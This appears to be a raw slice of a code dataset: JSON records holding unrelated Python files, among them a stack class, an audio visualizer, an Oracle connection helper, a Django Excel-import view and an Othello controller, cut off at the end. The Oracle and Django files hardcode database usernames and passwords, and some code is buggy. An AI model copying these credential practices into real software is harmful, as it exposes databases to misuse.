'shortexp/'\n\t\ttry:\n\t\t\tos.mkdir(short_out_dir)\n\t\texcept OSError:\n\t\t\tprint('Short exposure directory already exists in the 
output directory.')\n\t\toutput = short_out_dir + target + '_shortexp_FINAL'\n\t\tfiles = glob.glob(short_dir + '*flc.fits')\n\t\tastrodrizzle.AstroDrizzle(files, output = output, clean='Yes', skywidth=0.10000000149, skystat='mode', skylower= -100.0, driz_sep_pixfrac=0.7, driz_sep_bits='256,64,32', combine_nhigh=1, driz_cr_corr='yes', driz_cr_snr='3.0 3.0', driz_cr_grow=2, driz_cr_scale='1.0 0.7',final_wht_type = 'EXP', final_kernel='gaussian', final_pixfrac=0.8, final_bits='256,64,32', final_wcs='yes', final_scale=0.0333, gnkeyword='ATODGNA,ATODGNB,ATODGNC,ATODGND', rnkeyword='READNSEA,READNSEB,READNSEC,READNSED', expkeyword='EXPTIME')\n\t\tprint(\"Drizzling complete for short exposures in\", os.path.basename(directory))\n\n\tfor directory in dir_list:\n\t\ttarget = os.path.basename(directory)\n\t\tlong_dir = directory + '/longexp/'\n\t\tlong_out_dir = outdir + target + '/' + 'longexp/'\n\t\ttry:\n\t\t\tos.mkdir(long_dir)\n\t\texcept OSError:\n\t\t\tprint('Long exposure directory already exists in the output directory.')\n\t\toutput = long_out_dir + target +'_longexp_FINAL'\n\t\tfiles = glob.glob(long_dir + '*flc.fits')\n\t\tastrodrizzle.AstroDrizzle(files, output = output, clean='Yes', skywidth=0.10000000149, skystat='mode', skylower= -100.0, driz_sep_pixfrac=0.7, driz_sep_bits='256,64,32', combine_nhigh=1, driz_cr_corr='yes', driz_cr_snr='3.0 3.0', driz_cr_grow=2, driz_cr_scale='1.0 0.7',final_wht_type = 'EXP',final_kernel='gaussian', final_pixfrac=0.8, final_bits='256,64,32', final_wcs='yes', final_scale=0.0333, gnkeyword='ATODGNA,ATODGNB,ATODGNC,ATODGND', rnkeyword='READNSEA,READNSEB,READNSEC,READNSED', expkeyword='EXPTIME')\n\t\tprint(\"Drizzling complete for long exposures in\", os.path.basename(directory))\nif run_drizzle == 'no':\n\tprint(\"Drizzling skipped.\")\n","sub_path":"data_reduction.py","file_name":"data_reduction.py","file_ext":"py","file_size_in_byte":7234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"551208851","text":"#######################################\n# Data Structures and Problem Solving #\n# Implementing a Stack in Python\t #\n#\t\t\t\t\t\t\t\t\t #\n# @Author: Michiel Quintelier\t\t #\n# @Date: 17/11/2013 (dd/mm/yyyy)\t #\n# @University of Antwerp\t\t\t #\n#######################################\n\n## Array-Based Implementation ##\n\n\nclass Stack():\n\t'''Class representation of the ADT Stack'''\n\n\n\tdef __init__(self, size):\n\t\t'''Constructor'''\n\n\t\tself.stack = []\n\t\tfor i in range(size):\t\t\t# default constuction of a stack has 'size' None items\n\t\t\tself.stack.append(None)\n\n\t\tself.size = size\n\t\tself.top = None\t\t\t\t\t# top represents the index of the top item, None if empty\n\n\n\tdef __str__(self):\n\t\t'''Print overloading'''\n\n\t\tprintstring = '['\t\t\t\t\t\t\t\t\t# construct string type to be printed\n\t\tcounter = 1\n\t\tfor i in range(self.size):\n\t\t\tif counter == self.size:\t\t\t\t\t\t# special case last item\n\t\t\t\tprintstring += str(self.stack[i]) + ']'\n\t\t\telse:\n\t\t\t\tprintstring += str(self.stack[i]) + ', '\t# regular case normal item\n\t\t\t\tcounter += 1\n\n\t\treturn printstring\t\t\t\t\t\t\t\t\t# need of own constructed string because self.stack isn't a string\n\n\n\tdef isEmpty(self):\n\t\t'''Determines whether stack is empty'''\n\n\t\tif self.top == None:\t\t# if top is None, it means no items have been added yet\n\t\t\treturn True\n\t\telse:\t\t\t\t\t\t# if top is not of the Nonetype, it means items are present\n\t\t\treturn False\n\n\n\tdef 
push(self, newItem):\n\t\t'''Adds an item to the stack'''\n\n\t\ttry:\n\t\t\tif self.top == None:\t\t\t\t\t\t\t# for first item, top needs to be adjusted to an integer\n\t\t\t\tself.top = 0\n\t\t\t\tself.stack[self.top] = newItem\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tself.stack[self.top + 1] = newItem \t\t\t# try at top + 1 index, because that's where the exception could occur\n\t\t\t\tself.top += 1 \t\t\t\t\t\t\t\t# only increment after exception check, else top gets changed unwanted\n\t\t\t\treturn True\n\n\t\texcept:\n\t\t\tprint(\"Item was not added because the Stack is full.\")\n\t\t\treturn False\n\n\n\tdef pop(self):\n\t\t'''Removes the top of the stack'''\n\n\t\tif self.top == 0:\t\t\t\t\t\t\t# only one element --> top back to None\n\t\t\tself.stack[0] = None\n\t\t\tself.top = None\n\t\t\treturn True\n\n\t\telif self.top == None:\t\t\t\t\t\t# cannot delete from empty stack\n\t\t\tprint(\"The stack is already empty\")\n\t\t\treturn False\n\n\t\telse:\n\t\t\tself.stack[self.top] = None \t\t\t# set back to None state\n\t\t\tself.top -= 1\n\t\t\treturn True\n\n\n\n\t#### YES OR NO? ####\n\tdef retrievePop(self):\n\t\t'''Function to retrieve and delete the top of the stack'''\n\n\t\tpass\n\n\t\t'''This is basically a concatenation of the functions getTop and pop'''\n\t#### YES OR NO? ####\n\n\n\n\tdef getTop(self):\n\t\t'''Retrieves the top of the stack'''\n\n\t\tif self.top == None:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn self.stack[self.top]\n\n\n\tdef destroyStack(self):\n\t\t'''Destroys the stack'''\n\n\t\tdel self\n\n\n#TESTS\n'''\nnew = Stack(3)\nprint(new)\nnew.push(5)\nprint(new)\nnew.push(8)\nprint(new)\nnew.push(6)\nprint(new)\nnew.push('x')\nprint(new)\nnew.pop()\nprint(new)\nnew.pop()\nprint(new)\nnew.push('a')\nprint(new)\nprint(\"TOP: \", new.getTop())\nnew.push('b')\nprint(new)\nnew.pop()\nprint(new)\nnew.push('c')\nprint(new)\nnew.pop()\nprint(new)\nnew.push('d')\nprint(new)\nprint(\"TOP: \", new.getTop())\nnew.pop()\nprint(new)\nnew.pop()\nprint(new)\nnew.pop()\nprint(new)\nnew.pop()\nprint(new)\nnew.destroyStack()\nprint(new)\nprint(new)\n'''\n","sub_path":"Opdr1 + Opdr2 + Opdr3/Opdr1-Michiel/stackAB.py","file_name":"stackAB.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"2840872","text":"from game.item import Item\r\n\r\n\r\nclass LeatherBoots(Item):\r\n def __init__(self):\r\n super().__init__()\r\n self.name = 'Leather Boots'\r\n self.slot = 6\r\n self.type = 'Boots'\r\n self.slot_name = 'feet'\r\n self.defense = {'physical': 1}\r\n self.price = 10\r\n self.require = {'level': 1}\r\n\r\n\r\nleather_boots = LeatherBoots()\r\n","sub_path":"rpg/game/data/item/item_list/boots/leather_boots.py","file_name":"leather_boots.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"553828915","text":"import PyQt5\nfrom PyQt5 import QtGui, QtCore\nimport pyqtgraph as pg\n\n\nimport numpy as np\r\nimport pyaudio\r\nfrom queue import Queue\nimport struct\r\nfrom collections import deque\r\n\r\nq = Queue()\n\nWIDTH = 2\nCHANNELS = 1\nRATE = 16000\nCHUNK = 128\n\nclass Recorder():\n\n def __init__(self, q):\n # print('{} was called'.format(sys._getframe().f_code.co_name))\n self.p = pyaudio.PyAudio()\n self.q = q\n\n def open(self):\n self.stream = self.p.open(\n format=self.p.get_format_from_width(WIDTH),\n channels=CHANNELS,\n rate=RATE,\n input=True,\n input_device_index=0,\n 
output=False,\n output_device_index=1,\n frames_per_buffer=CHUNK,\n start=True,\n stream_callback=self._callback())\n\n\n\n def close(self):\n # print('{} was called'.format(sys._getframe().f_code.co_name))\n self.stream.stop_stream()\n self.stream.close()\n self.p.terminate()\n\n def _callback(self):\n def callback(in_data, frame_count, time_info, status):\n self.q.put(in_data)\n return (in_data, pyaudio.paContinue)\n\n return callback\n\n\n#-----\nwin = pg.GraphicsWindow(title=\"AudioVisualizer\")\r\np1 = win.addPlot(title=\"Left\")\r\nwin.nextRow()\r\np3 = win.addPlot(title=\"Left\")\r\n\r\ncurve1 = p1.plot(pen='y')\r\ncurve3 = p3.plot(pen='y')\r\np1.setYRange(- 10000,10000)\r\np3.setLogMode(x=False)\r\np3.setYRange(-0,160)\r\nplot_data = deque()\r\n\r\ndeq_max = 4\r\nmax_q=4\r\nw = np.hanning(CHUNK*max_q*deq_max)\r\n\r\nfor i in range(deq_max):\r\n plot_data.append(np.zeros(CHUNK*max_q))\r\n\r\ndef update():\r\n data = []\r\n for i in range(max_q):\r\n data += struct.unpack('h'*CHUNK*CHANNELS, q.get())\r\n\r\n plot_data.append(data)\r\n if len(plot_data) > deq_max:\r\n plot_data.popleft()\r\n\r\n data=np.reshape([plot_data[i] for i in range(deq_max)], (CHUNK*max_q*deq_max, 1))\r\n curve1.setData(data[::2, 0])\r\n\r\n data_=data[:,0]*w\r\n data_fft=np.fft.fft(data_)\r\n curve3.setData(20*np.log10(np.abs(data_fft[:len(data_fft)/2:2])+100))\r\n\r\n\r\ntimer = QtCore.QTimer()\r\ntimer.timeout.connect(update)\r\ntimer.start(1)\r\n\r\n## Start Qt event loop unless running in interactive mode or using pyside.\r\nif __name__ == '__main__':\r\n import sys\r\n recorder = Recorder(q)\r\n recorder.open()\r\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\r\n QtGui.QApplication.instance().exec_()\r\n recorder.close()\r\n","sub_path":"Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"611006600","text":"\"\"\"\nPURPOSE : Dataset preprocess\nHowever, it is useless now since we used DataImageGenerator and function: flow from directory\n\"\"\"\nimport glob\nimport pandas as pd\n\ncsv1Path = 'prep_images_rotated.csv'\ncsv2Path = 'result.csv'\n\ninputfile = \"*.csv\"\noutputfile = \"dog_training.csv\"\ncsv_list = glob.glob(inputfile)\n\nfilepath = csv_list[0]\ndf = pd.read_csv(filepath)\ndf = df.to_csv(outputfile, index=False)\n\nfor i in range(1, len(csv_list)):\n filepath = csv_list[i]\n df = pd.read_csv(filepath)\n df = df.to_csv(outputfile, index=False, header=False, mode='a+')\n","sub_path":"Model/coding/Data_preprocess/read_csv.py","file_name":"read_csv.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"190623451","text":"#!/usr/bin/env python\nimport os\nimport pika\nimport time\nimport asyncio\nfrom aio_pika import connect_robust\nfrom aio_pika.patterns import Master\n\namqp_url = os.environ['AMQP_URL']\n\nasync def main(loop):\n #connection = await connect_robust(\"amqp://guest:guest@127.0.0.1/\")\n connection = await connect_robust(amqp_url, loop=loop)\n print(\"Connected\")\n\n async with connection:\n # Creating channel\n channel = await connection.channel()\n print(\"Got channel\")\n\n master = Master(channel)\n print(\"Got master\")\n\n # Creates tasks by proxy object\n for task_id in range(10):\n await master.proxy.my_task_name(task_id=task_id)\n\n # Or using create_task method\n for task_id in range(10):\n print(\"Starting \",task_id)\n 
await master.create_task(\n                \"my_task_name\", kwargs=dict(task_id=task_id)\n            )\n\n        while(1):\n            time.sleep(1)\n\nif __name__ == \"__main__\":\n    time.sleep(15)\n    loop = asyncio.get_event_loop()\n    loop.run_until_complete(main(loop))\n","sub_path":"demo03/publisher/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"455900528","text":"#coding:utf-8\n\"\"\"\npymysql.Connect() parameter description\nhost(str):      MySQL server address\nport(int):      MySQL server port\nuser(str):      user name\npasswd(str):    password\ndb(str):        database name\ncharset(str):   connection encoding\n\nMethods supported by the connection object\ncursor()        create and return a cursor on this connection\ncommit()        commit the current transaction\nrollback()      roll back the current transaction\nclose()         close the connection\n\nMethods supported by the cursor object\nexecute(op)     execute a database query\nfetchone()      fetch the next row of the result set\nfetchmany(size) fetch the next few rows of the result set\nfetchall()      fetch all remaining rows of the result set\nrowcount()      number of rows returned or affected\nclose()         close the cursor object\n\n\"\"\"\n\nimport cx_Oracle\n\nclass C_oracle():\n    # connect to the database\n    def __init__(self):\n        user=u'dafy_sales'\n        passwd = u'Ju$2017'\n        print(cx_Oracle.clientversion())\n        host = 'idcdbtest.dafycredit.com'\n        #host = \"10.11.11.71\"\n        port = 1521\n        dbname='testdb'\n        #dsn = cx_Oracle.makedsn(host, port, dbname)\n        self.conn = cx_Oracle.connect(\"dafy_sales\",\"Ju$2017\",\"idcdbtest.dafycredit.com:1521/DBTEST01\")\n        self.cursor = self.conn.cursor()\n\n    # query data\n\n    def oracle_Search(self, sql):\n        self.cursor.execute(sql)\n        result = self.cursor.fetchall()\n        for row in result:\n            print(\"Name:%s\\tSaving:%.2f\" % row)\n        print('Found', self.cursor.rowcount, 'rows')\n        return result\n\n    def __del__(self):\n        # close the connection\n        self.cursor.close()\n        self.conn.close()\n\n\n\n\n\n\"\"\"\"\n# get a cursor\ncursor = conn.cursor()\n\n\n# insert data\nsql = \"INSERT INTO trade (name, account, saving) VALUES ( '%s', '%s', %.2f )\"\ndata = ('雷军', '13512345678', 10000)\ncursor.execute(sql % data)\nconn.commit()\nprint('Inserted', cursor.rowcount, 'rows')\n\n# update data\nsql = \"UPDATE trade SET saving = %.2f WHERE account = '%s' \"\ndata = (8888, '13512345678')\ncursor.execute(sql % data)\nconn.commit()\nprint('Updated', cursor.rowcount, 'rows')\n\n\n\n# delete data\nsql = \"DELETE FROM trade WHERE account = '%s' LIMIT %d\"\ndata = ('13512345678', 1)\ncursor.execute(sql % data)\nconn.commit()\nprint('Deleted', cursor.rowcount, 'rows')\n\n# transaction handling\nsql_1 = \"UPDATE trade SET saving = saving + 1000 WHERE account = '18012345678' \"\nsql_2 = \"UPDATE trade SET expend = expend + 1000 WHERE account = '18012345678' \"\nsql_3 = \"UPDATE trade SET income = income + 2000 WHERE account = '18012345678' \"\n\ntry:\n    cursor.execute(sql_1)   # saving + 1000\n    cursor.execute(sql_2)   # expend + 1000\n    cursor.execute(sql_3)   # income + 2000\nexcept Exception as e:\n    conn.rollback()  # roll back the transaction\n    print('Transaction failed', e)\nelse:\n    conn.commit()  # commit the transaction\n    print('Transaction succeeded', cursor.rowcount)\n\"\"\"\n# # close the connection\n# cursor.close()\n# conn.close()\n","sub_path":"common/conn_oracle.py","file_name":"conn_oracle.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"356023760","text":"from django.shortcuts import render\nimport re\nimport xlrd\nimport MySQLdb\nimport openpyxl\n\nfrom datetime import date\nimport datetime\n\nfrom .models import EmployeeInfoData\n\ndef emailvalid(emailid):\n    # Make a regular expression for validating an Email\n    regex = '^\\\w+([\\.-]?\\\w+)*@\\\w+([\\.-]?\\\w+)*(\\.\\\w{2,3})+$'\n    return re.search(regex,emailid)\n\ndef isphoneValid(number): \n    \n    # 1) Begins with 0 or 91 \n    # 2) Then contains 7 or 8 or 9. 
\n    # 3) Then contains 9 digits \n    Pattern = re.compile(\"(0|91)?[7-9][0-9]{9}\")  # '|' (alternation), not '/', matches the 0-or-91 prefix\n    return Pattern.match(number) \n\ndef calculate_age(born):\n    today = date.today()\n    return today.year - born.year - ((today.month, today.day) < (born.month, born.day))\n\ndef index(request):\n    if \"GET\" == request.method:\n        return render(request, 'myapp/index.html', {})\n    else:\n        if \"upload\" in request.POST:\n            excel_file = request.FILES[\"excel_file\"]\n            book = xlrd.open_workbook(file_contents=excel_file.read())\n            \n            sheet = book.sheet_by_index(0)\n            # Establish a MySQL connection\n            database = MySQLdb.connect (host=\"localhost\", user = \"root\", passwd = \"Basavaraj\", db = \"excel_data\")\n            cursor = database.cursor()\n            query = \"\"\"INSERT INTO myapp_employeeinfodata (name, email, phonenumber, age) VALUES (%s, %s, %s, %s)\"\"\"\n\n            # Create a For loop to iterate through each row in the XLS file\n            for r in range(1, sheet.nrows):\n                name = sheet.cell(r,0).value\n                email = ''\n                phonenumber = ''\n                age = None  # defaults, so the INSERT below never sees an unbound name\n                if sheet.cell(r,1).value:\n                    email_valid = emailvalid(sheet.cell(r,1).value)\n                    if email_valid:  # test the match result, not the emailvalid function object\n                        email = sheet.cell(r,1).value\n                    else:\n                        email = ''\n                if sheet.cell(r,2).value:\n                    phone_valid = isphoneValid(str(sheet.cell(r,2).value)) \n                    if phone_valid:\n                        phonenumber = sheet.cell(r,2).value\n                    else:\n                        phonenumber = ''\n\n                if sheet.cell(r,3).value:\n                    age = calculate_age(datetime.datetime(*xlrd.xldate_as_tuple(sheet.cell(r,3).value, book.datemode)))\n                try:\n                    values = (name, email, phonenumber, age)\n                    cursor.execute(query, values)\n                except Exception as e:\n                    print(\"\")\n            cursor.close()\n            # Commit the transaction\n            database.commit()\n\n            # Close the database connection\n            database.close()\n            # Execute sql Query\n            excel_data = EmployeeInfoData.objects.all()\n        elif 'search' in request.POST:\n            search_name = request.POST.get('search_value')\n            excel_data = EmployeeInfoData.objects.filter(name=search_name)\n        else:\n            excel_data = EmployeeInfoData.objects.all()\n\n    return render(request, 'myapp/index.html', {\"excel_data\":excel_data})\n\n\n\n\n\n\n\n\n\n","sub_path":"my_django_project/myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"176388934","text":"\nclass GameController():\n    \"\"\"This class displays the winner of the game and their number of tiles to\n    the screen as well as prints it to the console when a winner is declared\"\"\"\n\n    def __init__(self, WIDTH, HEIGHT):\n        \"\"\"Initializes GameController object\n        Int, Int --> None\n        \"\"\"\n        self.WIDTH = WIDTH\n        self.HEIGHT = HEIGHT\n        self.white_wins = False\n        self.black_wins = False\n        self.tie = False\n        self.winning_num = 0\n        self.end_game = False\n        self.print_turn = True\n\n    def update(self):\n        ''' Displays text declaring winner of game to screen as well as\n        number of winning tiles.\n        None --> None\n        '''\n        if self.white_wins:\n            fill(106, 20, 173)\n            textSize(50)\n            text(\"WHITE WINS WITH \" + str(self.winning_num) + \" TILES\",\n                 self.WIDTH/2 - 400, self.HEIGHT/2)\n        if self.black_wins:\n            fill(106, 20, 173)\n            textSize(50)\n            text(\"BLACK WINS WITH \" + str(self.winning_num) + \" TILES\",\n                 self.WIDTH/2 - 400, self.HEIGHT/2)\n        if self.tie:\n            fill(106, 20, 173)\n            textSize(50)\n            text(\"TIE WITH \" + str(self.winning_num) + \" TILES\",\n                 self.WIDTH/2 - 400, self.HEIGHT/2)\n\n    def update_terminal(self):\n        \"\"\" Prints winner of game and winning number of tiles to\n        the terminal only once game is over.\n        None --> prints string\n        \"\"\"\n        if not self.end_game and (self.white_wins or 
self.black_wins or\n self.tie):\n if self.white_wins:\n print(\"WHITE WINS WITH \" + str(self.winning_num) + \" TILES\")\n if self.black_wins:\n print(\"BLACK WINS WITH \" + str(self.winning_num) + \" TILES\")\n if self.tie:\n print(\"TIE WITH \" + str(self.winning_num) + \" TILES\")\n self.end_game = True\n\n","sub_path":"OthelloGame/game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"99053560","text":"import openpyxl\r\n\r\n\r\n# book:吸いだしたいシートのあるブック名, sheet:吸いだし元となるシート名\r\n# suidashi():{日付: [[予約情報],[予約情報]...[予約情報]]}の形の辞書のリストを返す\r\n\r\ndef suidashi(book, sheet):\r\n print('ワークブックを開きます...')\r\n\r\n wb = openpyxl.load_workbook(book)\r\n sheet = wb[sheet]\r\n # 取得したい行の範囲を指定(全て2列~13列)\r\n row_area = [[2, 33], [43, 74], [82, 113], [121, 151], [155, 186]]\r\n # 取得したい列の範囲を指定\r\n column_area = [2, 13]\r\n\r\n # 吸いだし作業\r\n all_list = []\r\n for i in range(0, len(row_area)):\r\n start_row = row_area[i][0]\r\n last_row = row_area[i][1]\r\n #  列ごとに吸い出す\r\n area_list = []\r\n for columns in list(sheet.columns):\r\n if not column_area[0] <= columns[0].column <= column_area[1]: # 条件に合わない範囲の列は飛ばす\r\n continue\r\n #  列から行ごとに吸い出す\r\n rows_list = []\r\n for cell in columns:\r\n if start_row <= cell.row <= last_row: # 条件に合う範囲のセルのみ取得\r\n rows_list.append(cell.value)\r\n area_list.append(rows_list)\r\n all_list.append(area_list)\r\n\r\n # 吸いだしたリストの整形作業1周目\r\n all_list2 = []\r\n for area in all_list:\r\n area_list2 = []\r\n for column_lis in area:\r\n dic_list = []\r\n for n in range(0, len(column_lis) - 1)[::2]:\r\n lis = []\r\n if n == 0:\r\n dic_list.append(column_lis[n])\r\n else:\r\n lis.append(column_lis[n])\r\n lis.append(column_lis[n + 1])\r\n dic_list.append(lis)\r\n area_list2.append(dic_list)\r\n all_list2.append(area_list2)\r\n\r\n # 吸いだしたリストの整形作業2周目\r\n all_list3 = []\r\n for area in all_list2:\r\n area_list3 = []\r\n for i in range(0, len(area) - 1)[::2]:\r\n area_list3.append(list(zip(area[i], area[i + 1])))\r\n all_list3.append(area_list3)\r\n\r\n # 吸いだしたリストの整形作業3周目(これで最後)\r\n all_list4 = []\r\n for area in all_list3:\r\n for column in area:\r\n master_data = {}\r\n cells_list = []\r\n for cell in column[1:]:\r\n name = cell[0][0]\r\n school = cell[0][1]\r\n memo = cell[1][0]\r\n time = cell[1][1]\r\n lis = [name, school, memo, time]\r\n cells_list.append(lis)\r\n master_data[column[0][0]] = cells_list\r\n if list(master_data.keys())[0] is not None:\r\n master_data[list(master_data.keys())[0]] = cells_list\r\n all_list4.append(master_data)\r\n\r\n return all_list4\r\n\r\n\r\n# suidashi()で得られたリスト(data_list)を、['日付', 'name', 'school', 'memo', 'time' ]のリストに変換\r\ndef to_list(data_list):\r\n reserve_list = []\r\n for dic in data_list:\r\n for k, v in dic.items():\r\n for i in v:\r\n lis = [k, *i]\r\n reserve_list.append(lis)\r\n return reserve_list\r\n\r\n\r\n# to_list()で得られたリスト(reserve_lis)を、bookの各行に書込む\r\ndef write_excel(reserve_lis, book):\r\n wb = openpyxl.Workbook()\r\n ws = wb.active\r\n for row in reserve_lis:\r\n ws.append(row)\r\n wb.save(book)\r\n print('書込み完了')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # 'SampleBook.xlsx'の'SampleSheet'からデータを吸い出し、整形した後、'SampleBook_transform.xlsx'を新規作成し書き込む\r\n write_excel(to_list(suidashi('SampleBook.xlsx', 'SampleSheet')), 
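# the reshaped rows land in a new workbook (added note)\r\n                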
'SampleBook_transform.xlsx')\r\n","sub_path":"kp_project.py","file_name":"kp_project.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"611406675","text":"# Copyright 2017 VMware, Inc.\n# All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nfrom neutron.tests import base\nfrom neutron_lib.plugins import constants\n\nfrom vmware_nsx.plugins.common.housekeeper import base_job\nfrom vmware_nsx.plugins.nsx_v.housekeeper import error_backup_edge\n\nFAKE_ROUTER_BINDINGS = [\n {\n 'router_id': 'backup-3b0b1fe1-c984', 'status': 'ERROR',\n 'availability_zone': 'default', 'edge_id': 'edge-782',\n 'edge_type': 'service', 'appliance_size': 'compact'}]\n\n\nclass ErrorBackupEdgeTestCaseReadOnly(base.BaseTestCase):\n\n def setUp(self):\n def get_plugin_mock(alias=constants.CORE):\n if alias in (constants.CORE, constants.L3):\n return self.plugin\n\n super(ErrorBackupEdgeTestCaseReadOnly, self).setUp()\n self.plugin = mock.Mock()\n self.context = mock.Mock()\n self.context.session = mock.Mock()\n mock.patch('neutron_lib.plugins.directory.get_plugin',\n side_effect=get_plugin_mock).start()\n self.log = mock.Mock()\n base_job.LOG = self.log\n self.job = error_backup_edge.ErrorBackupEdgeJob(True, [])\n\n def run_job(self):\n self.job.run(self.context, readonly=True)\n\n def test_clean_run(self):\n mock.patch('vmware_nsx.db.nsxv_db.get_nsxv_router_bindings',\n return_value=[]).start()\n self.run_job()\n self.log.warning.assert_not_called()\n\n def test_broken_backup_edge(self):\n mock.patch('vmware_nsx.db.nsxv_db.get_nsxv_router_bindings',\n return_value=FAKE_ROUTER_BINDINGS).start()\n\n self.run_job()\n self.log.warning.assert_called_once()\n\n\nclass ErrorBackupEdgeTestCaseReadWrite(ErrorBackupEdgeTestCaseReadOnly):\n def run_job(self):\n self.job.run(self.context, readonly=False)\n\n def test_broken_backup_edge(self):\n upd_binding = mock.patch(\n 'vmware_nsx.db.nsxv_db.update_nsxv_router_binding').start()\n upd_edge = mock.patch.object(self.plugin.nsx_v, 'update_edge').start()\n self.job.azs = mock.Mock()\n az = mock.Mock()\n mock.patch.object(self.job.azs, 'get_availability_zone',\n return_value=az).start()\n super(ErrorBackupEdgeTestCaseReadWrite, self\n ).test_broken_backup_edge()\n upd_binding.assert_has_calls(\n [mock.call(mock.ANY, r['router_id'], status='ACTIVE')\n for r in FAKE_ROUTER_BINDINGS])\n upd_edge.assert_called_with(\n self.context, 'backup-3b0b1fe1-c984', 'edge-782',\n 'backup-3b0b1fe1-c984', None, appliance_size='compact',\n availability_zone=az, dist=False)\n","sub_path":"vmware_nsx/tests/unit/nsx_v/housekeeper/test_error_backup_edge.py","file_name":"test_error_backup_edge.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"216406741","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : vpaz\nDate : 2019-02-01\nPurpose: Rock the Casbah\n\"\"\"\n\nimport os\nimport 
sys\n\n\n# --------------------------------------------------\ndef main():\n    arg = sys.argv[1:]\n    \n    if len(arg) == 0:\n        print('Usage: {} STRING'.format(os.path.basename(sys.argv[0])))\n        sys.exit(1)\n    elif len(arg) >= 1:\n        num = 0\n        for letters in arg[0]:\n            if letters in 'aeiouAEIOU':\n                num += 1 \n        if num == 1:\n            print('There is {} vowel in \"{}.\"'.format(str(num), arg[0]))\n        else:\n            print('There are {} vowels in \"{}.\"'.format(str(num), arg[0]))\n\n# --------------------------------------------------\nmain()\n","sub_path":"assignments/03-python-hello/vowel_counter.py","file_name":"vowel_counter.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"439118343","text":"# coding=utf-8\n\nimport pandas as pd\n\n\n\ndef fit(path, path2):\n    \n    origin = pd.read_csv(path, encoding='utf-8-sig')\n    hand = pd.read_excel(path2, sheet_name=0, encoding='utf-8-sig')\n\n    origin.loc[origin['in_node'] == origin['out_node'], 'type_user'] = '无效语义'  # literal kept as-is: the 'invalid semantics' label used in the data\n    origin['type_handle'] = ['*' for i in range(len(origin))]\n\n    for i, x in hand.iterrows():\n        print(i)\n        sid = int(x['session_id'])\n        in_node = x['in_node']\n        msg = x['msg']\n        handle = x['type_handle']\n        \n        # find idx1 matching this session id\n        indicate = origin.loc[origin['session_id']==sid]\n        # print(indicate)\n\n        idx1 = indicate.index\n        indicate2 = origin.loc[idx1].loc[origin['in_node'] == in_node]\n\n        # print(indicate2)\n        # find idx2 from idx1 and in_node\n        idx2 = indicate2.index\n        # print(origin.loc[idx2, 'msg'])\n        idx3 = origin.loc[idx2].loc[origin['msg'].str.contains(msg)].index \n\n        # if type_handle is empty or 'invalid semantics', set it; otherwise skip\n        # look up idx3 and set the corresponding type_handle value\n        if origin.loc[idx3, 'type_handle'].tolist()[0] in ['', '*', '无效语义']:\n            origin.loc[idx3, 'type_handle'] = [handle for i in range(len(idx3))]\n\n    return origin \n\n\n\n\ndef eval(df=None, if_csv=False, save_p=''):\n    \n    df = df.dropna(subset=['type_handle'])\n    df = df.loc[df['type_handle'] != '*']\n    total = len(df)\n\n    error = df.loc[df['type_user'] != df['type_handle']]\n    error = len(error)\n\n    e_rate = error/total\n    r_rate = 1 - e_rate\n    print(r_rate)\n    \n    if if_csv:\n        df.to_csv(save_p, index=False, encoding='utf-8-sig')\n\n\n\n# deduplicated labeled data -> non-deduplicated unlabeled data\ndef mapping(path, path2):\n    target = pd.read_excel(path, sheet_name=0, encoding='utf-8-sig' )\n    label = pd.read_excel(path2, sheet_name=0, encoding='utf-8-sig')\n\n\n    for i, l in label.iterrows():\n        print(i)\n        sid = l['session_id']\n        in_node = l['in_node']\n        msg = l['msg']\n        handle = l['type_handle']\n\n        first = target.loc[target['session_id'] == sid].index\n        second = target.loc[first].loc[target['in_node'] == in_node].index\n        final = target.loc[second].loc[target['msg'] == msg].index\n\n        target.loc[final, 'type_handle'] = handle\n\n    target.to_excel('./m1/hayinm1_nodel_tag_biaozhu.xlsx', encoding='utf-8-sig')\n\n    \n\n\n\n\nif __name__ == \"__main__\":\n    \n    # evaluation file\n    path = './m2/eval_m2.csv'\n    \n    # concatenation file\n    path_del_tag = './m2/hayinm2_tag_biaozhu.xlsx'\n    \n    # non-deduplicated file and non-deduplicated concatenation file\n  